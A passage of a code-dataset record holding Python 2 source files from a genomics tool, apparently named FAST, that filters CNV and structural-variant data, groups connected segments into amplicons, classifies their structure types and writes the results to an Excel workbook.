"3e4b30fbd678fc2ed0538df6901809523710cff6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8917, "license_type": "no_license", "max_line_length": 111, "num_lines": 249, "path": "/excelUtils.py", "repo_name": "zick-lab/FAST", "src_encoding": "UTF-8", "text": "import os\r\nimport xlsxwriter\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nCOLORS = [('yellow','black'),\r\n ('blue', 'white'),\r\n ('brown','white'),\r\n ('cyan', 'black'),\r\n ('gray','black'),\r\n ('green','black'),\r\n ('lime', 'black'),\r\n ('orange','black'),\r\n ('pink','black'),\r\n ('purple','black'),\r\n ('red','black'),\r\n ('silver','black'),\r\n ('navy','white'),\r\n ('black','white')]\r\n\r\n\r\n\r\ndef setFormats(workbook):\r\n formats = {}\r\n\r\n title_frmt = workbook.add_format()\r\n title_frmt.set_bold()\r\n title_frmt.set_font_size(16)\r\n title_frmt.set_underline()\r\n formats['title'] = title_frmt\r\n\r\n header = workbook.add_format()\r\n header.set_bold()\r\n formats['header'] = header\r\n\r\n colored = []\r\n bordered = []\r\n for c in COLORS:\r\n frmt = workbook.add_format()\r\n frmt.set_pattern(1)\r\n frmt.set_bg_color(c[0])\r\n frmt.set_font_color(c[1])\r\n colored.append(frmt)\r\n\r\n frmt = workbook.add_format()\r\n frmt.set_pattern(1)\r\n frmt.set_bg_color(c[0])\r\n frmt.set_font_color(c[1])\r\n frmt.set_border(3)\r\n frmt.set_pattern(15)\r\n frmt.set_bold()\r\n bordered.append(frmt)\r\n\r\n formats['colored'] = colored\r\n formats['bordered'] = bordered\r\n return formats\r\n\r\ndef writeHeader(title, l,worksheet, OFFSET, formats, comments=None):\r\n worksheet.write(OFFSET, 0, title, formats['title'])\r\n OFFSET += 1\r\n if comments:\r\n for comment in comments:\r\n print comment\r\n worksheet.write(OFFSET, 0, comment + '\\n')\r\n OFFSET+=1\r\n if len(l)==0:\r\n worksheet.write(OFFSET, 0, 'No data for this table', formats['header'])\r\n for i,item in enumerate(l):\r\n if str(item)=='nan':\r\n worksheet.write_blank(OFFSET,i,None)\r\n else:\r\n worksheet.write(OFFSET, i, l[i], formats['header'])\r\n OFFSET += 1\r\n return OFFSET\r\n\r\ndef writeEmptyHeader(title, message, worksheet, OFFSET, formats):\r\n worksheet.write(OFFSET, 0, title, formats['title'])\r\n OFFSET += 1\r\n worksheet.write(OFFSET, 0, message)\r\n OFFSET += 1\r\n return OFFSET\r\n\r\ndef writeEmptyRows(worksheet, OFFSET, n):\r\n for i in range(n):\r\n worksheet.write_blank(OFFSET+i,0,None)\r\n OFFSET += (i+1)\r\n return OFFSET\r\n\r\ndef setColors(l):\r\n return dict(zip(l,range(len(l)))), len(l)\r\n\r\ndef write_simple_table(worksheet, name, df, OFFSET,formats, index=False, comments=None):\r\n if df is not None and len(df)>0:\r\n cols = list(df.columns.values)\r\n cols_header = [df.index.name]+cols if index else cols\r\n else:\r\n cols = []\r\n cols_header = []\r\n OFFSET = writeHeader(name, cols_header, worksheet, OFFSET, formats,comments)\r\n if df is not None:\r\n iir = 0\r\n for ir, row in df.iterrows():\r\n if index:\r\n worksheet.write(OFFSET+iir, 0, ir)\r\n index_offset = 1\r\n else:\r\n index_offset = 0\r\n for ic in range(len(cols)):\r\n if not pd.isnull(row[ic]):\r\n worksheet.write(OFFSET+iir, ic+index_offset, row[ic])\r\n else:\r\n worksheet.write_blank(OFFSET+iir,ic+index_offset,None)\r\n iir+=1\r\n OFFSET += iir\r\n OFFSET = writeEmptyRows(worksheet, OFFSET, 3)\r\n return OFFSET\r\n\r\n\r\ndef write_excel(fast_output_dir, sample_id, dfcnv, dfsv, dfamplicons, dfsegments, df_focused_genes):\r\n outputFileXls = os.path.join(fast_output_dir, sample_id + '_FAST.xlsx')\r\n workbook = xlsxwriter.Workbook(outputFileXls)\r\n worksheet1 = workbook.add_worksheet('FAST')\r\n formats = setFormats(workbook)\r\n used_colors, ci = setColors(dfcnv['Segment ID'].unique())\r\n used_amplicons_colors , ci1= setColors(dfcnv['Amplicon ID'].unique())\r\n\r\n OFFSET = 0\r\n #\r\n # focused genes\r\n OFFSET = write_simple_table(worksheet1, 'Focused Genes', df_focused_genes, OFFSET, formats)\r\n\r\n OFFSET = writeEmptyRows(worksheet1, OFFSET, 3)\r\n\r\n # write dfamplicons data\r\n cols = [] if dfamplicons is None else list(dfamplicons.columns.values)\r\n OFFSET = writeHeader('Amplicon Analysis ', cols, worksheet1, OFFSET, formats)\r\n iir = 0\r\n if dfamplicons is not None:\r\n for ir, row in dfamplicons.iterrows():\r\n ## if np.isfinite(row['Amplicon ID']):\r\n frmt = formats['bordered'][used_amplicons_colors[row['Amplicon ID']]%len(COLORS)]\r\n worksheet1.write(OFFSET+iir, 0, row['Amplicon ID'],frmt)\r\n for ic in range(1,len(cols)):\r\n if not pd.isnull(row[ic]):\r\n worksheet1.write(OFFSET+iir, ic, row[ic])\r\n else:\r\n worksheet1.write_blank(OFFSET+iir,ic,None)\r\n iir+=1\r\n\r\n OFFSET += iir\r\n\r\n # write empty rows\r\n OFFSET = writeEmptyRows(worksheet1, OFFSET, 3)\r\n\r\n # write dfsegments data\r\n cols = [] if dfsegments is None else list(dfsegments.columns.values)\r\n OFFSET = writeHeader('Segment Analysis ', cols, worksheet1, OFFSET, formats)\r\n iir = 0\r\n if dfsegments is not None:\r\n for ir, row in dfsegments.iterrows():\r\n ## if np.isfinite(row['Amplicon ID']):\r\n frmt = formats['colored'][used_colors[row['Segment ID']] % len(COLORS)]\r\n worksheet1.write(OFFSET+iir, 0, row['Segment ID'],frmt)\r\n for ic in range(1,len(cols)):\r\n if not pd.isnull(row[ic]):\r\n worksheet1.write(OFFSET+iir, ic, row[ic])\r\n else:\r\n worksheet1.write_blank(OFFSET+iir,ic,None)\r\n iir+=1\r\n\r\n OFFSET += iir\r\n\r\n # write empty rows\r\n OFFSET = writeEmptyRows(worksheet1, OFFSET, 3)\r\n\r\n\r\n # write CNV data with corresponding colors\r\n cols = [] if dfcnv is None else list(dfcnv.columns.values)\r\n OFFSET = writeHeader('CNV Data', cols, worksheet1, OFFSET, formats)\r\n iir = 0\r\n if dfcnv is not None:\r\n for ir, row in dfcnv.iterrows():\r\n for ic, col in enumerate(dfcnv.columns):\r\n if col=='Segment ID':\r\n if np.isfinite(row['Segment ID']):\r\n frmt = formats['colored'][used_colors[row['Segment ID']] % len(COLORS)]\r\n else:\r\n frmt = None\r\n elif col=='Amplicon ID':\r\n if np.isfinite(row['Amplicon ID']):\r\n frmt = formats['bordered'][used_amplicons_colors[row['Amplicon ID']] % len(COLORS)]\r\n else:\r\n frmt = None\r\n else:\r\n frmt = None\r\n\r\n if not pd.isnull(row[ic]):\r\n if frmt:\r\n worksheet1.write(OFFSET+iir, ic, row[ic],frmt)\r\n else:\r\n worksheet1.write(OFFSET + iir, ic, row[ic])\r\n else:\r\n worksheet1.write_blank(OFFSET+iir,ic,None)\r\n iir+=1\r\n OFFSET += iir\r\n\r\n\r\n # write empty rows\r\n OFFSET = writeEmptyRows(worksheet1, OFFSET, 3)\r\n\r\n # write SV Data\r\n cols = [] if dfsv is None else list(dfsv.columns.values)\r\n OFFSET = writeHeader('SV Data', cols, worksheet1, OFFSET, formats)\r\n iir = 0\r\n\r\n # write dfsv\r\n if dfsv is not None:\r\n for ir, row in dfsv.iterrows():\r\n if pd.isnull(row['Segment1 ID']) and pd.isnull(row['Segment2 ID']):\r\n continue\r\n frmt_list = [None, None]\r\n for i in range(2):\r\n if not pd.isnull(row['Segment%d ID' % (i+1)]):\r\n frmt_list[i] = formats['colored'][used_colors[row['Segment%d ID'%(i+1)]]%len(COLORS)]\r\n\r\n for ic, col in enumerate(dfsv.columns):\r\n # one of the following columns: Chr1/2\tPos1/2\tOrientation1/2 segment1/2 edge1/2\r\n if col.find('1') > 0:\r\n frmt = frmt_list[0]\r\n elif col.find('2') > 0:\r\n frmt = frmt_list[1]\r\n else:\r\n if col=='Amplicon ID':\r\n if np.isfinite(row['Amplicon ID']):\r\n frmt = formats['bordered'][used_amplicons_colors[row['Amplicon ID']] % len(COLORS)]\r\n worksheet1.write(OFFSET + iir, ic, row['Amplicon ID'], frmt)\r\n continue\r\n else: frmt = None\r\n\r\n if not pd.isnull(row[col]):\r\n if frmt is None:\r\n worksheet1.write(OFFSET + iir, ic, row[col])\r\n else:\r\n worksheet1.write(OFFSET + iir, ic, row[col], frmt)\r\n else:\r\n worksheet1.write_blank(OFFSET + iir, ic, None)\r\n iir+=1\r\n\r\n workbook.close()\r\n" }, { "alpha_fraction": 0.6127102971076965, "alphanum_fraction": 0.617196261882782, "avg_line_length": 36.739131927490234, "blob_id": "c83f9d870b216ced1e1c171fec825fdf7da1250b", "content_id": "92bcc782bf20c4f2f7a6940d713714f65ea050b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2675, "license_type": "no_license", "max_line_length": 120, "num_lines": 69, "path": "/focusedGenesProcessing.py", "repo_name": "zick-lab/FAST", "src_encoding": "UTF-8", "text": "import argparse\r\nimport ConfigParser\r\n\r\nfrom excelUtils import *\r\n\r\nclass FL:\r\n def __init__(self,name, chrm, start,end):\r\n self.name = name\r\n self.chrm = chrm\r\n self.start = int(start)\r\n self.end = int(end)\r\n\r\n\r\ndef analyzeFileFocusedLocuses(dfcnv, dfamplicon, dfsegment, focused_genes):\r\n '''\r\n Analyze whether and which segments contain specific genes\r\n :param sample_id: sample ID\r\n :param dfcnv: dataframe of cnvs\r\n :param dfsegment: dataframe of segments\r\n :param dfamplicon: dataframe of amplicons\r\n :param focused_genes: list of focused genes\r\n :return:\r\n '''\r\n\r\n l_res = []\r\n\r\n for gene in focused_genes:\r\n dfcnv_gene = dfcnv[(dfcnv.chr==gene.chrm) & (dfcnv.start <= gene.end) & (dfcnv.end >= gene.start)]\r\n if len(dfcnv_gene)>0:\r\n copy_number = dfcnv_gene.iloc[0].CopyNumber\r\n amplicon = dfcnv_gene.iloc[0]['Amplicon ID']\r\n segment = dfcnv_gene.iloc[0]['Segment ID']\r\n if len(dfamplicon)==0:\r\n amplicon_struct_type = None\r\n else:\r\n amplicon_struct_type = dfamplicon[dfamplicon['Amplicon ID']==amplicon].iloc[0].Winner_Amplicon_Structure\r\n if len(dfsegment)==0:\r\n segment_struct_type = None\r\n else:\r\n df_seg = dfsegment[dfsegment['Segment ID']==segment]\r\n if len(df_seg)>0:\r\n segment_struct_type = df_seg.iloc[0].Winner_Segment_Structure\r\n else:\r\n segment_struct_type = None\r\n\r\n l_res.append([gene.name, copy_number, amplicon, amplicon_struct_type, segment, segment_struct_type])\r\n if len(l_res)==0:\r\n print 'No segment in oncogenes:'\r\n return l_res\r\n\r\ndef segments2FocusedGenes(dfcnv, dfamplicon, dfsegment, focused_locuses):\r\n '''\r\n :param s: sample ID\r\n :param dfcnv: dataframe of cnvs\r\n :param dfamplicon: dataframe of amplicons\r\n :param focused_locuses: list of focused genes\r\n :return:\r\n '''\r\n\r\n l_focusedGenes = analyzeFileFocusedLocuses(dfcnv, dfamplicon, dfsegment, focused_locuses)\r\n\r\n focused_genes_cols = ['Gene', 'copy_number', 'Amplicon ID', 'Amplicon Structure', 'Segment ID', 'Segment Structure']\r\n if len(l_focusedGenes)==0:\r\n df_focused_genes_analysis = pd.DataFrame(columns=focused_genes_cols, data=[[None]*len(focused_genes_cols)])\r\n else:\r\n df_focused_genes_analysis = pd.DataFrame(l_focusedGenes, columns=focused_genes_cols)\r\n df_focused_genes_analysis.sort_values(by='Amplicon Structure',ascending=True, inplace=True, na_position='last')\r\n\r\n return df_focused_genes_analysis\r\n\r\n" }, { "alpha_fraction": 0.5877243280410767, "alphanum_fraction": 0.5945267081260681, "avg_line_length": 40.18763732910156, "blob_id": "ea3c08d034385c181f310d4e31b7b5feadb3338c", "content_id": "2571d992a150b8bf656e73ec2fe75a22264caa95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19111, "license_type": "no_license", "max_line_length": 206, "num_lines": 453, "path": "/Fast.py", "repo_name": "zick-lab/FAST", "src_encoding": "UTF-8", "text": "'''\r\nFast is a tool for analyzing the structure and the characteristics of segments, based on CNVs and CVs\r\n'''\r\n\r\n__version__ = \"$Revision: 4 $\"\r\n# $Source$\r\n\r\nimport ConfigParser\r\nimport argparse\r\nimport csv\r\nimport datetime\r\nimport os\r\nimport re\r\nimport shutil\r\nimport time\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom collections import OrderedDict\r\n\r\n\r\nfrom focusedGenesProcessing import FL, segments2FocusedGenes\r\nfrom excelUtils import write_excel\r\n\r\n\r\nmut_types = ['ID', 'TR', 'DM', 'Other']\r\n\r\nCP = ConfigParser.ConfigParser()\r\n\r\ndef readCNVData(cnvFile, remove_unmappble, unify_seg = True):\r\n '''\r\n read cnv file, clear and filter it\r\n :param cnvFile: cvn file\r\n :param remove_unmappble: flag to indicate whether to remove unmappble areas\r\n :return: cleared, filtered cnv dataframe\r\n '''\r\n\r\n print 'readCNVData'\r\n dfcnv = pd.read_csv(cnvFile, prefix='CNV', header=None, names=['chr','start','end', 'CopyNumber', 'VariationType'],sep=None)\r\n dfcnv['start'] = dfcnv['start'].astype('int32')\r\n dfcnv['end'] = dfcnv['end'].astype('int32')\r\n dfcnv['chr'] = dfcnv['chr'].astype('str')\r\n dfcnv = dfcnv[dfcnv['chr'].apply(lambda x: re.match('[^0-9xy]',x) is None)]\r\n\r\n # filtering\r\n\r\n # filter only the gain\r\n dfcnv = dfcnv[dfcnv['VariationType']=='gain']\r\n # filter gain above some threshold\r\n dfcnv = dfcnv[dfcnv['CopyNumber']>=CP.getint('PARAMS','CNV_MINIMAL_CN')]\r\n\r\n # unify consecutive segments\r\n if unify_seg:\r\n dfcnv['prev_chr'] = dfcnv.chr.shift()\r\n dfcnv['prev_end'] = dfcnv.end.shift()\r\n dfcnv['not_same_segment'] = ~((dfcnv.prev_chr==dfcnv.chr) & (dfcnv.start == dfcnv.prev_end))\r\n dfcnv.ix[0,'not_same_segment'] = True\r\n dfcnv['Segment ID'] = np.cumsum(dfcnv.not_same_segment)\r\n dfcnv['Segment ID'] = dfcnv['Segment ID'].astype('int32')\r\n dfcnv = dfcnv[:len(dfcnv)-1]\r\n grouped = dfcnv.groupby('Segment ID', as_index=False)\r\n dfcnv = grouped.agg(OrderedDict((('chr','first'),\r\n ('start','first'),\r\n ('end','last'),\r\n ('CopyNumber', lambda x: int(np.mean(x))),\r\n ('VariationType','first'))))\r\n dfcnv['start'] = dfcnv['start'].astype('int32')\r\n dfcnv['end'] = dfcnv['end'].astype('int32')\r\n\r\n dfcnv['segment_size']=dfcnv['end']-dfcnv['start']\r\n dfcnv['Segment ID'] = np.array(range(len(dfcnv)))\r\n\r\n # remove unmappble areas\r\n if remove_unmappble:\r\n dfcnv = removeUnmap(dfcnv)\r\n\r\n dfcnv.sort_values(by='Segment ID', ascending=True, inplace=True, na_position='last')\r\n\r\n return dfcnv\r\n\r\n\r\ndef removeUnmap(dfcnv):\r\n '''\r\n util function, to remove unmappble areas from cnv dataframe\r\n :param dfcnv:\r\n :return: dfcnv, after removing unmappble areas\r\n '''\r\n THRESHOLD = CP.getint('PARAMS','WINDOW')*CP.getint('PARAMS','WINDOW_MULT')\r\n\r\n dfunmap = pd.read_csv(CP.get('FILES','UNMAPPBLE_INP'))\r\n dfunmap['chr'] = dfunmap['chr'].apply(lambda x: x.replace('chr',''))\r\n dftemp = pd.merge(dfcnv,dfunmap,how='left',on='chr', sort = False)\r\n dftemp['isUnmap'] = (dftemp['start'] <= (dftemp['chromEnd']+THRESHOLD)) & (dftemp['end'] >= (dftemp['chromStart']-THRESHOLD))\r\n dftemp=dftemp[dftemp['isUnmap']==True]\r\n dfcnv = pd.merge(dfcnv,dftemp[['chr','start','end','isUnmap']],how='left',on=['chr','start','end'],sort=True)\r\n dfcnv = dfcnv[pd.isnull(dfcnv['isUnmap'])]\r\n del dfcnv['isUnmap']\r\n return dfcnv\r\n\r\n\r\ndef readSVData(svFile):\r\n '''\r\n Read the SV file, perform some filtering and return a dataframe\r\n :param svFile: sv file\r\n :return: cleared, filtered sv dataframe\r\n '''\r\n print 'readSVData'\r\n\r\n col_names = ['Chr1', 'Pos1', 'Orientation1', 'Chr2', 'Pos2', 'Orientation2', 'Type', 'Size', 'Score', 'num_Reads']\r\n dfsv = pd.read_csv(svFile, sep='\\t', comment='#', header=None, usecols=range(len(col_names)), names=col_names)\r\n\r\n print 'dfsv read'\r\n\r\n # filtering records records\r\n dfsv = dfsv[dfsv['Score']>CP.getint('PARAMS','SV_MINIMAL_SCORE')]\r\n dfsv = dfsv[dfsv['num_Reads']>CP.getint('PARAMS','SV_MINIMAL_NUM_READS')]\r\n\r\n dfsv['Chr1'] = dfsv['Chr1'].astype('str')\r\n dfsv['Chr2'] = dfsv['Chr2'].astype('str')\r\n dfsv['Chr1'] = dfsv['Chr1'].apply(lambda x: x.replace('chr',''))\r\n dfsv['Chr2'] = dfsv['Chr2'].apply(lambda x: x.replace('chr',''))\r\n dfsv = dfsv[(dfsv['Chr1'].apply(lambda x: re.match('[^0-9xy]',x) is None)) & (dfsv['Chr2'].apply(lambda x: re.match('[^0-9xy]',x) is None))]\r\n\r\n # remove small deletions\r\n dfsv = dfsv[~(((dfsv['Type']=='DEL') | (dfsv['Type']=='ITX')) & (dfsv['Chr1']==dfsv['Chr2']) & (abs(dfsv['Pos2']-dfsv['Pos1'])<CP.getint('PARAMS','SV_MINIMAL_DELETIONS_REMOVE')))]\r\n\r\n # digitize\r\n win = CP.getint('PARAMS','WINDOW')\r\n dfsv['Pos1'] = dfsv['Pos1'].apply(lambda x: (x//win)*win)\r\n dfsv['Pos2'] = dfsv['Pos2'].apply(lambda x: (x//win)*win)\r\n\r\n # and one additional filtering\r\n dfsv=unifySvRecords(dfsv)\r\n return dfsv\r\n\r\n\r\ndef unifySvRecords (dfsv):\r\n '''\r\n unify close enough svs\r\n :param dfsv\r\n :return: dfsv with unified closed svs\r\n '''\r\n dfsv.sort_values(by=['Chr1','Pos1','Chr2','Pos2'],ascending=[True]*4,inplace=True)\r\n dfsv['unify'] = np.nan\r\n counter = 0\r\n row_it = dfsv.iterrows()\r\n i, last = row_it.next()\r\n dfsv.loc[i,'unify'] = counter\r\n\r\n for i, row in row_it:\r\n if not (row['Chr1']==last['Chr1'] and row['Chr2']==last['Chr2'] and (abs(row['Pos1']-last['Pos1']))<1000 and (abs(row['Pos2']-last['Pos2']))<1000 and row['Type']==last['Type']):\r\n counter += 1\r\n dfsv.loc[i,'unify'] = counter\r\n last = row\r\n\r\n grouped = dfsv.groupby('unify', as_index=False)\r\n dfsv = grouped.agg(OrderedDict((('Chr1','first'),\r\n ('Pos1', lambda x: int(np.mean(x))),\r\n ('Orientation1', 'first'),\r\n ('Chr2', 'first'),\r\n ('Pos2', lambda x: int(np.mean(x))),\r\n ('Orientation2', 'first'),\r\n ('Type', 'first'),\r\n ('Size', 'sum'),\r\n ('Score', lambda x: int(np.mean(x))),\r\n ('num_Reads', 'sum'),\r\n )))\r\n del dfsv['unify']\r\n return dfsv\r\n\r\n\r\ndef assignSegmentsForSVs (dfcnv, dfsv):\r\n '''\r\n Assign segments to each <chr,location> in breakpoint\r\n :param dfcnv: df of cnv\r\n :param dfsv: df of sv\r\n :return: dfsv with segment for each <chr,location> in breakpoint\r\n '''\r\n THRESHOLD = CP.getint('PARAMS','WINDOW')*CP.getint('PARAMS','WINDOW_MULT')\r\n\r\n for j in [1, 2]:\r\n dfsv['Segment%d ID' % j] = None\r\n dfsv['edge%d' % j] = None\r\n\r\n grouped_segments = dfcnv.groupby('chr')\r\n\r\n for i, row in dfsv.iterrows():\r\n for j in [1,2]:\r\n if row['Chr%d' % j] in grouped_segments.groups:\r\n segments_in_chr = grouped_segments.get_group(row['Chr%d' % j])\r\n for seg_row, seg_record in segments_in_chr.iterrows():\r\n if (seg_record['start']-THRESHOLD) <= row['Pos%d' % j] <= (seg_record['end'] + THRESHOLD):\r\n dfsv.loc[i, 'Segment%d ID' % j] = seg_record['Segment ID']\r\n if seg_record['start'] + THRESHOLD > row['Pos%d' % j]:\r\n dfsv.loc[i, 'edge%d' % j] = 'left'\r\n elif seg_record['end'] - THRESHOLD < row['Pos%d' % j]:\r\n dfsv.loc[i, 'edge%d' % j] = 'right'\r\n else:\r\n dfsv.loc[i, 'edge%d' % j] = 'middle'\r\n break\r\n\r\n return dfsv\r\n\r\n\r\ndef createAmpliconFromConnectedSegments(max_segment, dfsv, dfcnv):\r\n '''\r\n identify connected segments (= amplicons) based on breakpoints, and assign them an Amplicon ID\r\n :param max_segment: maximal number of segments\r\n :param dfsv: df of sv\r\n :param dfsegments: df of segments\r\n :return: dfsegments, dfamplicons\r\n '''\r\n\r\n def dfs(a, visited, u, val):\r\n \"\"\" DFS for finding connected segments\"\"\"\r\n for v, temp in enumerate(a[u]):\r\n if a[u][v] == 0:\r\n continue\r\n if visited.has_key(v) == False:\r\n visited[v] = val\r\n dfs(a, visited, v, val)\r\n\r\n relevant_dfsv = dfsv.dropna(subset=['Segment1 ID','Segment2 ID'])\r\n\r\n a = np.zeros((max_segment+1, max_segment+1))\r\n for i, row in relevant_dfsv.iterrows():\r\n a[row['Segment1 ID']][row['Segment2 ID']] = 1\r\n a[row['Segment2 ID']][row['Segment1 ID']] = 1\r\n\r\n con_comp = 0\r\n visited = {}\r\n for u in range(max_segment+1):\r\n if not visited.has_key(u):\r\n visited[u] = con_comp\r\n dfs(a,visited,u,con_comp)\r\n con_comp += 1\r\n\r\n # dfsegments['Amplicon ID']=dfsegments['Segment ID'].map(visited.get)\r\n dfcnv['Amplicon ID'] = dfcnv['Segment ID'].map(visited.get)\r\n\r\n dfamplicons = pd.DataFrame(dfcnv[['Amplicon ID','Segment ID','segment_size']].groupby('Amplicon ID').agg({'Segment ID':'count', 'segment_size':'sum',}))\r\n dfamplicons = dfamplicons[dfamplicons['segment_size']>0]\r\n dfamplicons.reset_index(inplace=True)\r\n dfamplicons.rename(columns={'Segment ID':'nsegments_in_amplicon','segment_size': 'amplicon_size'}, inplace=True)\r\n\r\n return dfcnv, dfamplicons\r\n\r\n\r\ndef updateAmpliconsInSVs(dfcnv, dfsv):\r\n '''\r\n Assign Amplicon ID for segments in dfcnv and dfsv\r\n :param dfcnv: df of cnv\r\n :param dfsv: df of sv\r\n :param dfsegments: df of segments\r\n :return: updated dfcnv and dfsv\r\n '''\r\n \"\"\" assign amplicons to segments and to breakpoints\"\"\"\r\n dfsv = pd.merge(dfsv,dfcnv[['Segment ID','Amplicon ID']],how='left',left_on = 'Segment1 ID',right_on = 'Segment ID',sort=False)\r\n del dfsv['Segment ID']\r\n\r\n dfsv = pd.merge(dfsv,dfcnv[['Segment ID','Amplicon ID']],how='left',left_on = 'Segment2 ID',right_on = 'Segment ID',sort=False, suffixes=['1','2'])\r\n del dfsv['Segment ID']\r\n\r\n dfsv = dfsv.rename(columns={'Amplicon ID1': 'Amplicon1 ID', 'Amplicon ID2': 'Amplicon2 ID'})\r\n dfsv.loc[dfsv['Amplicon1 ID'].isnull(),'Amplicon1 ID'] = dfsv['Amplicon2 ID']\r\n del dfsv['Amplicon2 ID']\r\n dfsv = dfsv.rename(columns={'Amplicon1 ID':'Amplicon ID'})\r\n dfsv.dropna(inplace=True, subset=['Amplicon ID'])\r\n dfsv['Amplicon ID'] = dfsv['Amplicon ID'].astype(int)\r\n\r\n # dfcnv = pd.merge(dfcnv,dfsegments[['Segment ID','Amplicon ID']],how='left',on='Segment ID',sort=False)\r\n\r\n return dfcnv, dfsv\r\n\r\n\r\ndef setStructureTypeToSV(dfsv):\r\n if dfsv.empty:\r\n return dfsv\r\n\r\n dfsv['Structure Type'] = None\r\n\r\n for i, row in dfsv.iterrows():\r\n structure_type = 'Other'\r\n if not (pd.isnull(row['Segment1 ID']) or pd.isnull(row['Segment2 ID'])):\r\n if row['Segment1 ID']==row['Segment2 ID']:\r\n if row['edge1']=='middle' and row['edge2']=='middle' and row['Type']== 'DEL':\r\n structure_type = np.NaN\r\n#michalin\r\n# elif row['edge1']==row['edge2'] and not row['edge1']=='middle':\r\n elif row['edge1']==row['edge2']:\r\n if row['Type']=='INV':\r\n structure_type = 'ID'\r\n elif row['Type']=='ITX' and not (row['edge1']=='middle' and row['edge2']=='middle'):\r\n structure_type = 'TR'\r\n else:\r\n structure_type = 'DM'\r\n else:\r\n structure_type = np.NaN\r\n dfsv.loc[i, 'Structure Type'] = structure_type\r\n\r\n return dfsv\r\n\r\ndef assignAmpliconStructureType(dfamplicon, dfsv):\r\n if dfsv.empty:\r\n return pd.DataFrame()\r\n\r\n grouped_by_amp = dfsv.groupby(['Amplicon ID', 'Structure Type'], as_index = False)\r\n df_amp_counts = grouped_by_amp['num_Reads'].agg({'num_Reads': 'sum'})\r\n\r\n df_amp_counts = df_amp_counts.set_index(['Amplicon ID', 'Structure Type'])['num_Reads'].unstack().reset_index()\r\n df_amp_counts.columns = df_amp_counts.columns.tolist()\r\n\r\n # if len(df_amp_counts) == 0:\r\n # return pd.DataFrame()\r\n\r\n for m in mut_types:\r\n if not m in df_amp_counts.columns:\r\n df_amp_counts[m] = np.NaN\r\n df_amp_counts[m] = df_amp_counts[m].apply(pd.to_numeric, errors='ignore')\r\n\r\n # find the winner structure type for each edge based on majority of supporting reads\r\n\r\n dfamplicon = pd.merge(dfamplicon, df_amp_counts[['Amplicon ID'] + mut_types], how='left', on='Amplicon ID', copy=False)\r\n dfamplicon['Winner_Amplicon_Structure'] = dfamplicon[mut_types].idxmax(axis=1)\r\n\r\n return dfamplicon\r\n\r\ndef assignSegmentStructureType(dfsv):\r\n if dfsv.empty:\r\n return pd.DataFrame()\r\n\r\n # create a dataframe where each row contains one edge of the BP\r\n df_bp1 = pd.DataFrame(data={'Segment ID': dfsv['Segment1 ID'], 'num_Reads': dfsv['num_Reads'], 'Structure Type': dfsv['Structure Type'], 'orig_ind':dfsv.index})\r\n df_bp2 = pd.DataFrame(data={'Segment ID': dfsv['Segment2 ID'], 'num_Reads': dfsv['num_Reads'], 'Structure Type': dfsv['Structure Type'],'orig_ind': dfsv.index})\r\n\r\n df_bps = pd.concat([df_bp1, df_bp2])\r\n # workarround what seems to be a bug in drop_duplicates\r\n df_bps[\"joined\"] = df_bps[\"Segment ID\"].map(str) + \"\" + df_bps[\"orig_ind\"].map(str)\r\n df_bps.reset_index(drop=True, inplace=True)\r\n\r\n # if two sides of bp are the same segment, remove one of it\r\n #df_bps.drop_duplicates(subset=['Segment ID', 'orig_ind'], inplace=True)\r\n df_bps.drop_duplicates(subset='joined', inplace=True)\r\n\r\n grouped_by_segment = df_bps.groupby(['Segment ID', 'Structure Type'], as_index = False)\r\n dfsegment_counts = grouped_by_segment['num_Reads'].agg({'num_Reads': 'sum'})\r\n\r\n dfsegment_counts = dfsegment_counts.set_index(['Segment ID', 'Structure Type'])['num_Reads'].unstack().reset_index()\r\n dfsegment_counts.columns = dfsegment_counts.columns.tolist()\r\n\r\n # if len(df_amp_counts) == 0:\r\n # return pd.DataFrame()\r\n\r\n for m in mut_types:\r\n if not m in dfsegment_counts.columns:\r\n dfsegment_counts[m] = np.NaN\r\n dfsegment_counts[m] = dfsegment_counts[m].apply(pd.to_numeric, errors='ignore')\r\n\r\n # find the winner structure type for each edge based on majority of supporting reads\r\n\r\n dfsegment = dfsegment_counts[['Segment ID'] + mut_types]\r\n dfsegment.loc[:,'Winner_Segment_Structure'] = dfsegment[mut_types].idxmax(axis=1)\r\n\r\n return dfsegment\r\n\r\n\r\n\r\ndef run(excel, remove_unmappble, unify_seg, config_file, sample_id, cnv_file, sv_file, fast_output_dir, focused_genes):\r\n '''\r\n main run\r\n :param excel: flag: should we output to excel file\r\n :param remove_unmappble: flag: should we remove unmappble regions\r\n :param config_file: configuration file\r\n :param sample_id: sample ID\r\n :param cnv_file: path to cnv file\r\n :param sv_file: path to sv file\r\n :param fast_output_dir: output directory\r\n :param focused_genes: focused genes list\r\n :return: --\r\n '''\r\n\r\n if not os.path.exists(fast_output_dir):\r\n os.makedirs(fast_output_dir)\r\n\r\n # Read Data\r\n dfcnv = readCNVData(cnv_file, remove_unmappble, unify_seg)\r\n dfsv = readSVData(sv_file)\r\n\r\n dfsv = assignSegmentsForSVs(dfcnv, dfsv)\r\n # dfsv, dfsegments = assignSegmentsForSVs(dfcnv, dfsv)\r\n\r\n # Amplicons Handing\r\n dfcnv, dfamplicons = createAmpliconFromConnectedSegments(dfcnv['Segment ID'].max(), dfsv, dfcnv)\r\n dfcnv, dfsv = updateAmpliconsInSVs(dfcnv, dfsv)\r\n\r\n # Define Structure Type\r\n dfsv = setStructureTypeToSV(dfsv)\r\n dfamplicons = assignAmpliconStructureType(dfamplicons, dfsv)\r\n\r\n dfsegments = assignSegmentStructureType(dfsv)\r\n\r\n # focused genes\r\n\r\n df_focused_genes = segments2FocusedGenes(dfcnv, dfamplicons, dfsegments, focused_genes)\r\n if len(dfamplicons)>0:\r\n df_amp_gene = pd.merge(dfamplicons, df_focused_genes[['Amplicon ID', 'Gene']], how='left', left_on='Amplicon ID', right_on='Amplicon ID', copy=False)\r\n temp = df_amp_gene.groupby('Amplicon ID')['Gene'].apply(lambda g: ', '.join([x for x in g if isinstance(x,str)])).to_frame().reset_index()\r\n dfamplicons = pd.merge(dfamplicons, temp, how='left', on='Amplicon ID', copy=False)\r\n\r\n\r\n dfsegment_gene = pd.merge(dfcnv, df_focused_genes[['Segment ID', 'Gene']], how='left', left_on='Segment ID', right_on='Segment ID', copy=False)\r\n temp = dfsegment_gene.groupby('Segment ID')['Gene'].apply(lambda g: ', '.join([x 